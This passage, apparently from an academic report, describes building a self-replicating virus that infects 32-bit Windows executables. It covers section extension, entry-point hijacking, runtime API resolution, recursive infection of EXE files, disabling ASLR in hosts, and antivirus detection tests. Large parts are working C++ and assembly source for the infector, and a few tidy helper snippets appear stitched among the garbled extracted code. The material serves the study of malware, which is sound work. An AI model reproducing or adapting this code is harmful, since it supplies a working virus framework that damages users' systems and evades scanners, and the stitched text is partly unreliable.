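#include <stdint.h>

/* Round value up to the next multiple of alignment (alignment must be > 0).
 * A value that is already aligned is returned unchanged. */
uint32_t align_up(uint32_t value, uint32_t alignment) {
    uint32_t remainder = value % alignment;
    return remainder == 0 ? value : value + (alignment - remainder);
}
```

With an alignment of 0x200, a size of 0x1234 rounds up to 0x1400, while a size of 0x400 stays 0x400.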

Note that expanding the last section of a PE, and marking it executable, makes our virus easier to detect (using heuristics), in comparison to using a code cave in the middle of a section. However, since evading anti-virus software is not our aim in this academic example, we choose the former method anyway.

4.2 EntryPoint

To make sure our code will get executed, there are again several possibilities. One possibility is to analyze the original code and to modify it in such a way that it will jump to our code at some point. Much easier, but of course less stealthy, is to simply change the AddressOfEntryPoint in the optional header to point to the injected code. This way the PE will execute our code first. If we save the original AddressOfEntryPoint somewhere, we can write our own code in such a way that when it is finished, it jumps to the original host program code.

4.3 Programming issues

Because of the low-level nature of what we are trying to accomplish, assembly is the obvious language to work in. It is however much easier to write a program in a high level programming language like C or C++. After all, the compiler will translate this code into machine code anyway, so the end result is the same.

Even when writing the injected code in assembly, there is a problem when using calls to functions: a function call takes an address to the called function, but we do not know what that address will be in the host program at the time when we are writing our code. This problem will be solved by using placeholders when writing the code. We can for example write 0xCCCCCCCC each time we refer to an address we do not know yet. When the host PE file is opened, we should resolve all missing addresses and make sure that they are correctly filled in before injecting the code.

In C++, the same problem exists but because it is a high level language it is not that obvious to work around it. In assembly, a function is called by call functionaddress but in C++ we usually write something like function(). So how do we make sure the address of this function is corrected before injection? There is also a problem when using strings. When we want our injected code to show a message box for example, we would write something like MessageBox("our message"). The compiler however doesn’t put the code and the used string “our message” at the same place in memory: the string is put in the data section, and the MessageBox code in the code section uses the address of that string. Like the function addresses, this address won’t be the same in the host application.

Besides these addressing difficulties, there is also the issue that the compiled code will most likely not work in the host application if the default compiler settings are used. These pitfalls and working solutions will be examined in detail in Chapter 5 where we will go over the most important aspects of our source code.

Chapter 5

Implementation

It is quite difficult to find decent information on the implementation of a virus. Many people claim to have written a “virus” but they only wrote some program or Visual Basic script that adds a key to the Windows registry so the “virus” gets executed on each boot of the OS and does some annoying things. We found one book[9] that provides source code but it uses assembly. It is also outdated since it can’t handle the PE format and only targets DOS programs.

When looking for “PE injection” we found again many assembly examples, but one of those injects the assembly code with a C++ program[1]. Our own implementation is built on the code presented there.

5.1 First experiments

In our first experiments, we simply started from the exact tutorial as presented in [1] to test if it actually works. We found out it does: it shows a message box before the host program can start.

#define bb(x) __asm _emit x

__declspec(naked) void StubStart(){__asm{

5 pushad // Preserve all registers

// Delta offset trick to get correct ebpcall GetBasePointer

GetBasePointer:10 pop ebp

sub ebp, offset GetBasePointer

// Create message box: MessageBox(NULL, szText, szTitle, MB_OK)// Push arguments to MessageBox (in reverse order)

15 push MB_OK

lea eax, [ebp+szTitle]push eaxlea eax, [ebp+szText]push eax

20 push 0// Call MessageBox (its address is a placeholder)mov eax, 0xCCCCCCCCcall eax

25 popad // Restore registerspush 0xCCCCCCCC // Push address of original entry point (placeholder)retn // retn used as jmp

szText:30 bb(’G’) bb(’r’) bb(’e’) bb(’e’) bb(’t’) bb(’i’) bb(’n’)

bb(’g’) bb(’s’) bb(’ ’) bb(’f’) bb(’r’) bb(’o’) bb(’m’)bb(’ ’) bb(’B’) bb(’e’) bb(’e’) bb(’r’) bb(’e’) bb(’n’)bb(’d’) bb(’ ’) bb(’&’) bb(’ ’) bb(’J’) bb(’a’) bb(’n’)bb(’w’) bb(’i’) bb(’l’) bb(’l’) bb(’e’) bb(’m’) bb(0)

35 szTitle:bb(’O’) bb(’S’) bb(’S’) bb(’E’) bb(’C’) bb(0)

}}void StubEnd(){}

The 0xCCCCCCCC addresses are placeholders that need to be replaced before injecting the code. At this point, we are able to inject assembly code into the host, but our goal is to write our viral code in C++ and then inject it.

5.2 Compiler settings

Because we use inline functions and a lot of relative addressing, we need to ensure that the code gets compiled exactly in the way that we intend it. This can be done by configuring the compiler with the following options (Visual Studio):

• Optimization: Maximize Speed (/O2). This option forces the compiler to really inline the functions when we ask it.

• Enable Incremental Linking: No (/INCREMENTAL:NO). This ensures that the generated machine code is in the same order as the source code.

• Release mode. When building in debug mode, the added debug information will cause the injected code to crash.

Figure 5.1: Structure of the injected code. Blocks, in order: Parameters, Constants, Assembly stub, C stub (ThreadStart, InfectDir). Labels: AStubStart, CStubStart, ThreadStart, InfectDir, VCodeEnd.

5.3 Viral code structure

Figure 5.1 shows the structure of our injected code. We will briefly explain the different parts here and elaborate on them in the next sections. The first block is a Parameters structure which contains information that will need to be updated for each host. The second is also a structure but the information in this one remains constant for all hosts. The rest are functions:

• AStubStart is a small assembly stub, based on the code from section 5.1. However, instead of calling the MessageBox function, we call our own CStubStart function.

• CStubStart is a C function that shows a MessageBox, starts ThreadStart in a new thread and returns.

• ThreadStart contains the code for a separate thread that will contain the payload. In our case, it just searches for new hosts which it will infect.

• InfectDir is a recursive function that is used by ThreadStart.

5.4 First generation

In this section, we will explain the injection of our code into the first host. The full code can be found in Appendix A. We will go over the most important parts here.

First, we calculate the sizes of the different components of our viral code. (For more information, see figure 5.1.)

int main(int argc, char* argv[]) {...// Work out stub size.// Our viral code contains: parameters, constants, assembly stub, C stub

5 DWORD aStubSize = (DWORD)CStubStart - (DWORD)AStubStart;DWORD cStubSize = (DWORD)VCodeEnd - (DWORD)CStubStart;DWORD stubSize = (DWORD)VCodeEnd - (DWORD)AStubStart; // Not including

parameters or constantsDWORD totalSize = stubSize + sizeof(Parameters) + sizeof(Constants);

Next, we open the file we want to infect and use some functions of the WindowsAPI to map the PE file structure. We also check whether the file is already infected.(We put a signature in the DOS header to signal this.) If so, we won’t infect it asecond time.// Map file to infect.const char *fileName = target;hFile = CreateFile(fileName, GENERIC_WRITE | GENERIC_READ,

FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL, NULL);

...5 fsize = GetFileSize(hFile, 0);

...hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize,

NULL);...

10 hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0,fsize);

...if (pDosHeader->e_res[0] == 0x424a) {

// File already infected.15 goto cleanup;

}pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);...

We increase the file size by the size of our viral code, rounded up to be amultiple of the SectionAlignment in the PE header. If we don’t do this correctly,the file will be corrupt and no longer work. After doing this, we need to re-map PEstructure.// Work out extra size needed in exe, rounded up to a multiple of

alignment.DWORD alignment = pNtHeaders->OptionalHeader.SectionAlignment;DWORD alignedTotalSize = ((totalSize / alignment) + 1) * alignment;

5 // Reload file map and increase the fileSize by what we need to injectour code (respecting the SectionAlignment)

// First, clean up old map....// Increase file size.fsize += alignedTotalSize;

10 // Re-create map.hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize,

NULL);...hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0,

15 fsize);...

We go to the header of the last section to increase the size fields and change the characteristics of the section, so it can be executed. We also increase the SizeOfImage in the PE header. If not done correctly, the file will be corrupt.

// Get first and last section.pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->

e_lfanew + sizeof(IMAGE_NT_HEADERS));pFirstSection = pSectionHeader;pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections

- 1);5

// Create a place for our viral thread and its parameters, by extendingthe last section.

pLastSection->Misc.VirtualSize += totalSize;pLastSection->SizeOfRawData += alignedTotalSize;pLastSection->Characteristics |= IMAGE_SCN_MEM_WRITE |

IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;10 pNtHeaders->OptionalHeader.SizeOfImage = pLastSection->VirtualAddress +

pLastSection->Misc.VirtualSize;

We copy the assembly stub into a buffer so we can modify its code. We replace the 0xCCCCCCCC placeholders with what will be the actual addresses in this target host.

• oepOffset is the offset in the assembly stub of the placeholder for the address of the original entry point (oep).

• parsOffset is the offset in the assembly stub of the placeholder for the address of the parameters structure. Our CStubStart takes a pointer to this structure as an argument. Because we know all sizes and offsets, our code can find all required information relative to this address.

• saOffset is the offset in the assembly stub of the placeholder for the address of CStubStart (i.e. the start address, hence ‘sa’).

// Save original entry point.oep = oepRva = pNtHeaders->OptionalHeader.AddressOfEntryPoint;oep += pSectionHeader->PointerToRawData -pSectionHeader->VirtualAddress;

5 // Copy stub into a buffer....// Locate offsets of placeholders in assembly stub....// Fill in placeholders.

10 *(u_long *)(aStub + oepOffset) = pNtHeaders->OptionalHeader.ImageBase +oepRva;

*(u_long *)(aStub + parsOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -totalSize;

*(u_long *)(aStub + saOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -totalSize + sizeof(Parameters) + sizeof(Constants) + aStubSize;

We create the constants structure for the first time and fill in all fields. TheSetLLAndGPA function (described in section 5.4.1) will fill in the parametersstructure.// Create constants and parameters.Constants consts;// Fill in sizes....

5 // Fill in offsets of placeholders....// Fill in strings....// Offsets of functions.

10 consts.offsetCStubStart = sizeof(Parameters) + sizeof(Constants) +aStubSize;

consts.offsetThreadStart = (DWORD)ThreadStart - (DWORD)CStubStart;consts.offsetInjectDir = (DWORD)injectDir - (DWORD)CStubStart;

Parameters pars;15 // Addresses/offsets of library functions.

// Fill in the ’base address’ and offsets to LoadLibraryA andGetProcAddress.

// This way, we can use those functions even if they are not originallyimported by the host program.

setLLAndGPA(&pars, hMap, pNtHeaders, pFirstSection);

Finally, we append our viral code to the target. We write it piece by piece:Parameters, Constants, assembly stub, C code. Note that we write the assemblystub from the buffer, where the placeholders have been replaced. We also make theAddressOfEntryPoint point to the start of our assembly stub and place our signaturein the DOS header.// Write our code to the last section.PBYTE startInjectedCode = (PBYTE)hMap + pLastSection->PointerToRawData +

pLastSection->Misc.VirtualSize - totalSize;memcpy(startInjectedCode, &pars, sizeof(Parameters));memcpy(startInjectedCode + sizeof(Parameters), &consts,

5 sizeof(Constants));memcpy(startInjectedCode + sizeof(Parameters) + sizeof(Constants),

aStub, aStubSize);memcpy(startInjectedCode + sizeof(Parameters) + sizeof(Constants) +

aStubSize, CStubStart, cStubSize);10 // Set new entrypoint.

pNtHeaders->OptionalHeader.AddressOfEntryPoint = pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize - totalSize + sizeof(Parameters) + sizeof(Constants);

// Write our signaturepDosHeader->e_res[0] = (DWORD)0x424a;// Clean up.

15 ...}

5.4.1 setLLAndGPA

[1] replaced the MessageBox placeholder by an address obtained via GetProcAddress at the time of injection. This address however is not guaranteed to remain the same if the computer should reboot. To solve this problem, we want to load all required API functions dynamically at runtime. To do this, we need access to LoadLibrary and GetProcAddress from Kernel32.dll, but not all programs will import those. One solution would be to use LdrLoadDll and LdrGetProcedureAddress from ntdll.lib which can be linked at compile time[7]. Another solution is to perform “memory walking” in Kernel32.dll, using some known address as a base and try to find the required functions relative to that base.

We chose the second solution: the setLLAndGPA function, used in the previous section, will walk over the Import Address Table of the target host and look for the first function that is imported from Kernel32.dll. It will store its name and RVA in the PE file. The value at this RVA will at runtime contain the address of this function. We will determine the relative addresses of LoadLibrary and GetProcAddress with respect to this function. The found RVA and the two offsets will be stored in the Parameters structure.

bool setLLAndGPA(Parameters *pars, LPBYTE hMap, IMAGE_NT_HEADERS *pNtHeaders, IMAGE_SECTION_HEADER *pFirstSection) {

// Load librariesHMODULE hUser32 = LoadLibrary("User32.dll");HMODULE hKernel32 = LoadLibrary("Kernel32.dll");

5 ...// Read importsPIMAGE_IMPORT_DESCRIPTOR pImports = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD)hMap + Rva2Offset(

pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress,

10 pFirstSection, pNtHeaders->FileHeader.NumberOfSections));// Look at the import address table of the hostDWORD baseFuncRVA;char* baseFuncName;while (pImports->Name) {

15 char* s = (char*)((DWORD)hMap +Rva2Offset(pImports->Name, pFirstSection,

pNtHeaders->FileHeader.NumberOfSections));DWORD pImageThunk = pImports->OriginalFirstThunk ? pImports->

OriginalFirstThunk : pImports->FirstThunk;PIMAGE_THUNK_DATA itd = (PIMAGE_THUNK_DATA)(

20 (DWORD)hMap +

Rva2Offset(pImageThunk, pFirstSection,pNtHeaders->FileHeader.NumberOfSections));

pImageThunk = pImports->FirstThunk;25 while (itd->u1.AddressOfData) {

PIMAGE_IMPORT_BY_NAME name_import = (IMAGE_IMPORT_BY_NAME*)((DWORD)hMap +Rva2Offset((DWORD)itd->u1.AddressOfData, pFirstSection,

pNtHeaders->FileHeader.NumberOfSections));30 // Get a any (first) imported function from Kernel32.dll

if(!stricmp(s, "kernel32.dll")) {baseFuncRVA = pNtHeaders->OptionalHeader.ImageBase + pImageThunk;baseFuncName = (char*)name_import->Name;break;

35 }itd++;pImageThunk += sizeof(DWORD);

}pImports++;

40 }// Set parametersDWORD addressBaseFunc = (DWORD)GetProcAddress(hKernel32, baseFuncName);pars->baseFunctionRVAinIAT = baseFuncRVA;pars->walkOffsetLL = (DWORD)GetProcAddress(hKernel32, "LoadLibraryA") -

addressBaseFunc;45 pars->walkOffsetGPA = (DWORD)GetProcAddress(hKernel32, "GetProcAddress")

- addressBaseFunc;// Free libraries and return...

}

5.4.2 AStubStart

Our assembly stub will simply push the address of our Parameters on the stack and call CStubStart. When this function returns, the assembly stub will return to the original entry point, passing control to the original host program.

As explained in the previous sections, this function contains three placeholders.__declspec(naked) void AStubStart() {__asm{

pushad // Preserve all registers

5 push 0xCCCCCCCC // parameters: pointer to Parameters, passed toCStubStart

mov eax, 0xCCCCCCCC // sa: address at which CStubStart can be foundcall eax // Call CStubStart

popad // Restore registers10 push 0xCCCCCCCC // Push address of original entry point

retn // retn used as jmp}

}

5.4.3 CStubStart

This function receives a pointer to the parameter structure. Since the exact size of this structure is known, the function can use this information to also obtain pointers to the Constants structure and itself. From its own address and the offset stored in the Constants, it can calculate the address of ThreadStart.

void CStubStart(Parameters *pars) {Constants *consts = (Constants*)((DWORD)pars + sizeof(Parameters));DWORD addrOfSelf = (DWORD)pars + consts->offsetCStubStart;DWORD addrOfThreadStart = addrOfSelf + consts->offsetThreadStart;

Now, we load LoadLibrary and GetProcAddress, with the information in the Parameters. We use these functions to load the MessageBox function from User32.dll and CreateThread from Kernel32.dll. We show a message box with our greeting and start our viral code in a new thread.

LoadLibraryFun loadLibraryF = (LoadLibraryFun)(

*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetLL);GetProcAddressFun getProcAddressF = (GetProcAddressFun)(

*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetGPA);5

HMODULE user32 = loadLibraryF(consts->user32dll);HMODULE kernel32 = loadLibraryF(consts->kernel32dll);MessageBoxFun msgBoxAF = (MessageBoxFun)getProcAddressF(user32,consts->messageboxa);

10 CreateThreadFun createThreadF = (CreateThreadFun)getProcAddressF(kernel32, consts->createthread);

msgBoxAF(NULL, consts->text, consts->caption, consts->buttons);

15 createThreadF(NULL, 0, (LPTHREAD_START_ROUTINE)addrOfThreadStart,pars, 0, NULL);

return;}

5.4.4 ThreadStart

In our thread, we create a structure that contains the addresses of the functions we need. As before in CStubStart, we load all these addresses dynamically. Next, we call infectDir. This is a recursive function which will go through a target directory (consts->targetPath, e.g. C:\Windows), infecting all EXE files it finds.

DWORD ThreadStart(LPVOID parsVoid) {Parameters *pars = (Parameters*)parsVoid;Constants *consts = (Constants*)((DWORD)pars + sizeof(Parameters));

5 LoadLibraryFun loadLibraryF = (LoadLibraryFun)(

*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetLL);GetProcAddressFun getProcAddressF = (GetProcAddressFun)(

*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetGPA);

10 HMODULE user32 = loadLibraryF(consts->user32dll);HMODULE kernel32 = loadLibraryF(consts->kernel32dll);

Functions f;f.MessageBox = (MessageBoxFun)getProcAddressF(user32,

15 consts->messageboxa);...f.FindFirstFile = (FindFirstFileFun)getProcAddressF(kernel32,

consts->findfirstfile);f.FindNextFile = (FindNextFileFun)getProcAddressF(kernel32,

20 consts->findnextfile);

DWORD addrOfCStub = (DWORD)pars + consts->offsetCStubStart;DWORD addrOfInfectDir = addrOfCStub + consts->offsetInfectDir;infectDirFun infectDirF = (infectDirFun)addrOfInfectDir;

25 infectDirF(consts->targetPath, addrOfInfectDir, pars, consts, &f);return 0;

}

5.5 Next generations

To make sure that infected programs can again infect others, the injection code itself should also be injected. The infectDir function, described previously, will call infectEXE. This is an inline function that is very similar to the main function of the first generation. The differences are that all calls to API functions are replaced by function pointers, all constant strings are looked up in the Constants and the code can be copied in one piece from the infecting host to the new target.

5.6 Disinfection

Because the infection procedure is deterministic, it can easily be reversed, resulting in the following disinfection procedure:

• find the original EntryPoint of the host in the viral code

• overwrite the viral code with zeros

• restore the size fields in the header of the last section

• restore the original EntryPoint in the OptionalHeader

• remove our signature from the DOS header

• restore the original file size

The code to do this is given in Appendix B.

5.7 Summary

To summarize all the above, the injected C code should:

• Contain no explicit function calls: we store their names in the Constants and load them dynamically at runtime, and can then call them using function pointers.

• Contain no constant strings: put those in the Constants.

• Use inline function expansion as much as possible.

• If inlining is not possible, find the relative offset of the function with respect to CStubStart and put this offset in the Constants (as we did for infectDir).

Note: compiler specific functions like memcpy, strcpy, malloc, free, etc. will not work when they are injected, so it is necessary to use a Windows API equivalent or write your own implementation.

Chapter 6

Tests and Results

During the development of our virus, we continuously tested if each addition still worked. In this chapter we show the final result of our virus.

6.1 Viral replication

Figure 6.1a shows the original host application we chose to infect with our firstgeneration virus. It has a file size of 66kB.

(a) before infection (b) after infection

Figure 6.1: Filesize (a) before (b) after infection

After running our infection program, we can already see that the file size has increased to 70kB (figure 6.1b). Furthermore we can analyze the PE structure and see that our signature is now present in the DOS header (figure 6.2a).
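Because the marker sits at a fixed place in the DOS header, a scanner or disinfection tool can test for it without parsing the rest of the file. A minimal sketch, assuming the file has already been read into a buffer: `has_infection_marker` is a hypothetical name, 0x1C is the offset of e_res[0] in IMAGE_DOS_HEADER, and 0x424A is the signature value used in section 5.4.

```c
#include <stddef.h>
#include <stdint.h>

#define DOS_E_RES_OFFSET 0x1Cu   /* offset of e_res[0] in IMAGE_DOS_HEADER */
#define INFECTION_MARKER 0x424Au /* signature value from section 5.4       */

/* Returns 1 if the buffer starts with a DOS header whose e_res[0] field
 * holds the marker, 0 otherwise. The buffer is only read, never modified. */
int has_infection_marker(const uint8_t *buf, size_t len) {
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return 0; /* too short or not a DOS header */
    uint16_t e_res0 = (uint16_t)(buf[DOS_E_RES_OFFSET] |
                                 (buf[DOS_E_RES_OFFSET + 1] << 8));
    return e_res0 == INFECTION_MARKER;
}
```

The field is stored little-endian, so the marker appears in the file as the bytes 4A 42.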

(a) DOS header with our signature

(b) Last section, containing our constant strings

Figure 6.2: Infected file, containing (a) our signature and (b) our constant strings

If we take a look in the last section, we can see that our code is indeed injected. The Constants structure is very easy to find because it contains our constant strings (figure 6.2b).

When we run the infected application, a message box with our greeting appears (figure 6.3) to indicate that this file is indeed infected. When we click it away, the original host program will start and in the background our infection thread will run.

Figure 6.3: Greeting of our virus

If we take a look at our infection target folder, we can already see that the instance of PEview.exe now also has a file size of 70kB (fig. 6.4). This file is now infected with a second generation of our virus and it also has the capability to spread the virus. This is the case for every executable that was present in this folder and all subfolders, so to show this we would need to put some uninfected executables in the folder again. Next, we can execute one of the programs that is infected with our second generation virus. The result will be that again every EXE in the target folder will be infected. No files will get infected more than once because our virus looks for our signature in the DOS header and will not infect files that already have this signature. This demonstrates the replication ability of our virus.

Figure 6.4: Next generation virus

6.2 Infection capability

We tested our virus on a 32 bit Windows 7 computer. 64 bit PE files have a similarstructure, but might not be handled correctly by our virus because of the largeraddress sizes in those files. We haven’t tested this.

Another type of exe files that can’t be infected by our virus are .NET executa-bles: they don’t import any functions from kernel32.dll so our virus will not be ableto find the addresses of the API functions it needs. We added some extra checks inour final injection code to ensure that these files remain untouched in order to notcorrupt them.

During our tests we noticed that some applications crashed after being infected by our virus. By analyzing those files more closely we found that they make use of Address Space Layout Randomization (ASLR)[18]. The cmd.exe program in the Windows/System32 folder is an example of such an application. We were able to work around this by simply clearing the flag in the OptionalHeader that enables ASLR. This seems to work fine at first sight, but it may also make the host application more vulnerable to memory-based exploits such as buffer overflows, because we disabled the ASLR security feature.
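Since a cleared ASLR flag weakens the host application, an administrator may want to audit whether an executable still opts in to ASLR. The sketch below only inspects an already-read value of the DllCharacteristics field of the OptionalHeader. The bit value 0x0040 is the dynamic-base flag (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE in the Windows headers); the constant and function names kDynamicBase and aslrEnabled are hypothetical and chosen for this illustration.

```cpp
#include <cstdint>

// Dynamic-base (ASLR opt-in) bit of OptionalHeader.DllCharacteristics.
constexpr std::uint16_t kDynamicBase = 0x0040;

// Returns true if the image declares that it may be relocated at load time.
// Read-only check on a field value that the caller has already extracted.
constexpr bool aslrEnabled(std::uint16_t dllCharacteristics) {
    return (dllCharacteristics & kDynamicBase) != 0;
}
```

For example, a field value of 0x8140 has the bit set, so aslrEnabled returns true, while 0x8100 yields false. An executable that was built with ASLR but now reports false is a hint that its header has been tampered with.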

6.3 Anti-virus

Although we didn’t care much about being stealthy, we were interested in whether our virus would be detected by anti-virus software. The computer on which we tested our virus uses Lavasoft Ad-Aware and BitDefender. Installing more anti-virus programs is hard because most of them complain if they are not the only one. After some searching we found a website called VirusTotal (www.virustotal.com), which is a subsidiary of Google. It allows you to upload a file, which it then runs through several malware scanners. We infected 4 different programs with our virus and asked VirusTotal to scan them.

The result is that our virus was detected by 7 out of 46, 4 out of 45, 7 out of 46 and 5 out of 45 scanners. (We suspect that the number of scanners used varies depending on the server load at that time.) On average, this is a detection rate of 12.6%. On the one hand, it is normal that many scanners don’t detect our virus, because it is unknown to them: the scanners need to rely on heuristics, as explained in section 2.2.2. On the other hand, it is somewhat alarming that the heuristic scanners of so many anti-virus programs are so poor. It is however important to note that VirusTotal only uses the file scan functionality of these programs. They may still be able to detect the suspicious behavior of our virus at runtime.
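The 12.6% figure can be reproduced from the four scan results. The sketch below computes it in two ways, as the mean of the per-sample detection rates and as a pooled rate over all scans; the type and function names (ScanResult, meanDetectionRate, pooledDetectionRate) are hypothetical and used only for this illustration.

```cpp
// One VirusTotal report: how many of the scanners flagged the sample.
struct ScanResult {
    int detections;
    int scanners;
};

// Mean of the per-sample detection rates.
constexpr double meanDetectionRate(const ScanResult* results, int count) {
    double sum = 0.0;
    for (int i = 0; i < count; ++i) {
        sum += static_cast<double>(results[i].detections) / results[i].scanners;
    }
    return count > 0 ? sum / count : 0.0;
}

// Pooled rate: total detections divided by total scans.
constexpr double pooledDetectionRate(const ScanResult* results, int count) {
    int detections = 0;
    int scanners = 0;
    for (int i = 0; i < count; ++i) {
        detections += results[i].detections;
        scanners += results[i].scanners;
    }
    return scanners > 0 ? static_cast<double>(detections) / scanners : 0.0;
}
```

For the four samples {7, 46}, {4, 45}, {7, 46} and {5, 45}, the mean of the per-sample rates is about 0.1261 and the pooled rate is 23/182, about 0.1264. Both round to 12.6%.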


Used scanners

The different scanners that were used by VirusTotal are listed below. The number of stars behind each name indicates in how many of the provided samples the scanner detected our virus. Only one of them was able to consistently detect it!

1. Agnitum
2. AhnLab-V3
3. AntiVir***
4. Antiy-AVL
5. Avast
6. AVG
7. BitDefender*
8. ByteHero
9. CAT-QuickHeal*
10. ClamAV
11. Commtouch
12. Comodo*
13. DrWeb
14. Emsisoft*
15. eSafe
16. ESET-NOD32***
17. F-Prot
18. F-Secure*
19. Fortinet
20. GData*
21. Ikarus
22. Jiangmin
23. K7AntiVirus
24. Kaspersky*
25. Kingsoft
26. Malwarebytes
27. McAfee**
28. McAfee-GW-Edition****
29. Microsoft
30. MicroWorld-eScan
31. NANO-Antivirus
32. Norman
33. nProtect
34. Panda
35. PCTools
36. Rising
37. Sophos
38. SUPERAntiSpyware
39. Symantec
40. TheHacker
41. TotalDefense
42. TrendMicro*
43. TrendMicro-HouseCall*
44. VBA32
45. VIPRE**
46. ViRobot

When we re-uploaded one of the samples one week later, we noticed that more scanners were able to detect our virus: the detection ratio for this sample went from 4/45 to 13/46. This indicates that the virus scanners have learned about our virus. VirusTotal states that, if at least one scanner detects a submitted sample, the sample is sent free of charge to the vendors of all scanners that did not detect it.

Chapter 7

Conclusion

In this paper, we explained and showed how a C++ program could be injected into another Portable Executable. We used this technique to write a self-replicating parasitic virus, targeting 32-bit Windows computers. Since our virus is only intended as an academic example, we confined the infection process to a single directory and didn’t include any malicious payload. It is however not that hard to use the framework we provide for such purposes.

We thoroughly tested the resulting virus and examined its infection capability by infecting different host applications. We also looked at how stealthy our virus is by having it analyzed by multiple anti-virus programs, showing that they perform quite poorly against a new virus. We made no effort at all to hide our virus, but most of them failed to recognize it anyway.

Note that there is also a much easier method to inject your own code into another executable: the viral code can simply be written like a regular C program and be compiled into a DLL. The injected code can then dynamically load this DLL and execute its exported functions[2]. This way, the total amount of injected code will be much smaller and the viral code in the DLL doesn’t need to be written specifically to be injected, i.e. using inline function expansion, relative addressing, the Constants structure, etc. The disadvantage is that this is more conspicuous and can easily be countered by just finding and removing the injected DLL.


Appendix A

Infection code

This is the full source code of our first generation infection program. This program opens a file and injects our entire viral code. After infection, when the infected file is executed it will show a message box and then run the original program. In a separate thread, all EXE files in the target directory will also be infected. The names of the first file to be infected and the target directory are hardcoded as "PEview.exe" and "C:\test" respectively, but this can easily be changed if required. Make sure that the compiler is configured as described in section 5.2.

#include <Windows.h>#include <iostream>#include <strsafe.h>

5 #pragma region Type Declarations

struct Parameters; struct Constants; struct Functions;

// Function types.10 // Windows API functions.

typedef int (WINAPI *MessageBoxFun)(HWND, LPCSTR, LPCSTR, UINT);typedef HMODULE (WINAPI *LoadLibraryFun)(LPCSTR);typedef FARPROC (WINAPI *GetProcAddressFun)(HMODULE, LPCSTR);typedef HANDLE (WINAPI *CreateThreadFun)(LPSECURITY_ATTRIBUTES, SIZE_T,

LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);15 typedef HANDLE (WINAPI *CreateFileFun)(LPCSTR, DWORD, DWORD,

LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);typedef DWORD (WINAPI *GetFileSizeFun)(HANDLE, LPDWORD);typedef HANDLE (WINAPI *CreateFileMappingFun)(HANDLE,

LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCSTR);typedef LPVOID (WINAPI *MapViewOfFileFun)(HANDLE, DWORD, DWORD, DWORD,

SIZE_T);typedef BOOL (WINAPI *FlushViewOfFileFun)(LPCVOID, SIZE_T);

20 typedef BOOL (WINAPI *UnmapViewOfFileFun)(LPCVOID);typedef DWORD (WINAPI *SetFilePointerFun)(HANDLE, LONG, PLONG, DWORD);typedef BOOL (WINAPI *SetEndOfFileFun)(HANDLE);typedef BOOL (WINAPI *CloseHandleFun)(HANDLE);

38

39

typedef BOOL (WINAPI *FreeLibraryFun)(HMODULE);25 typedef HANDLE (WINAPI *FindFirstFileFun)(LPCSTR, LPWIN32_FIND_DATA);

typedef BOOL (WINAPI *FindNextFileFun)(HANDLE, LPWIN32_FIND_DATA);// Our own functions.typedef DWORD (*ThreadStartFun)(LPVOID);typedef void (*infectDirFun)(LPCSTR, DWORD, Parameters*, Constants*,

Functions*);30

#define STR_MAX_LENGTH 512

// Parameters included in viral code.struct Parameters {

35 // Offsets of library functions.// Relative Virtual Address of ’base function’ in Import Address Table.// At this location, we will find a pointer to the base function.DWORD baseFunctionRVAinIAT;// Offsets of library functions to base function.

40 DWORD walkOffsetLL, walkOffsetGPA;DWORD baseFunctionRVAinIAT2;// Offsets of library functions to base function.DWORD walkOffsetLL2, walkOffsetGPA2;

};45

// Constants included in viral code.struct Constants {

// Sizes.DWORD aStubSize, cStubSize, stubSize, totalSize;

50

// Offsets of placeholders in assembly stub.DWORD parsOffset, saOffset, oepOffset;

// Offsets of our own functions.55 // Offset between CStubStart and parameters.

// = sizeof(Parameters) + size of AStub.DWORD offsetCStubStart;// Offset between CStubStart and ThreadStart.// = address of ThreadStart - address of CStubStart.

60 DWORD offsetThreadStart;DWORD offsetInfectDir;

// Strings.char user32dll[50];

65 char kernel32dll[50];char createthread[50];char createfilea[50];char getfilesize[50];char createfilemappinga[50];

70 char mapviewoffile[50];char copymemory[50];char flushviewoffile[50];char unmapviewoffile[50];char setfilepointer[50];

75 char setendoffile[50];char closehandle[50];char loadlibrarya[50];char getprocaddress[50];

40 APPENDIX A. INFECTION CODE

char freelibrary[50];80 char messageboxa[50];

char findfirstfile[50];char findnextfile[50];char text[50];char caption[50];

85 int buttons;char targetPath[50];

};

// Functions used in the injection code.90 struct Functions {

CreateThreadFun CreateThread;CreateFileFun CreateFile;GetFileSizeFun GetFileSize;CreateFileMappingFun CreateFileMapping;

95 MapViewOfFileFun MapViewOfFile;FlushViewOfFileFun FlushViewOfFile;UnmapViewOfFileFun UnmapViewOfFile;SetFilePointerFun SetFilePointer;SetEndOfFileFun SetEndOfFile;

100 CloseHandleFun CloseHandle;LoadLibraryFun LoadLibrary;GetProcAddressFun GetProcAddress;FreeLibraryFun FreeLibrary;MessageBoxFun MessageBox;

105 FindFirstFileFun FindFirstFile;FindNextFileFun FindNextFile;

};

#pragma endregion110

